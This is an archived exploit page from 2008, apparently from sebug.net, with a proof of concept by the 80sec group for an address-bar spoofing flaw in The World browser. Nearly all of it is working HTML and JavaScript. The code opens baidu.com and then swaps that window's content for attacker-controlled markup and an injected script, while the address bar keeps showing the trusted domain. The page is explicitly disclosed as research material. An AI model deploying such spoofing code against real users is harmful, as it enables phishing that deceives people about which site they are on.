世界之窗(The World)浏览器地址栏欺骗漏洞POC
Published:2008-11-17
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
世界之窗(the world)浏览器地址栏欺骗漏洞
<br>
+++++++++++++++++++++++++++++++++++++++++
<br>
新打开的链接,地址栏是http://www.baidu.com
<br>
内容却是被人恶意控制的
<br>
<br>
<a href="javascript:win()">Baidu</a>
<script>
function win(){
x=window.open('http://www.baidu.com');
x.location="about:Baidu要过冬了<br><br>其实80sec说了也不算数了......<script>document.title=\"Hacked By 80sec\"</sc"+"ript>";
}
</script>
<br>
<br>
++++++++++++++++++++++++++++++++++++++++
<br>
<br>
By 80sec安全小组// Sebug.net [ 2008-11-17 ]